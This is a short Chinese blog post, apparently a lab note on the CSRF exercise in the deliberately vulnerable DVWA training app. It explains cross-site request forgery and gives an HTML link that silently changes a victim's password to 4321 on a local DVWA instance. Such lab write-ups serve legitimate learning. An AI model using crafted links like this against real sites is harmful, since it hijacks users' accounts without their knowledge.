DVWA CRSF

主要方式就是引诱用户去点击一个是黑客精心构造的一个html中的一个按钮(或者是引诱用户去访问一个精心构造的url),而该按钮会发生一个请求给目标服务器

<html>
    <a href="http://192.168.31.160/vulnerabilities/csrf/?password_new=4321&password_conf=4321&Change=Change#">click</a>
</html>
posted @ 2023-03-02 20:28  明月照江江  阅读(22)  评论(0编辑  收藏  举报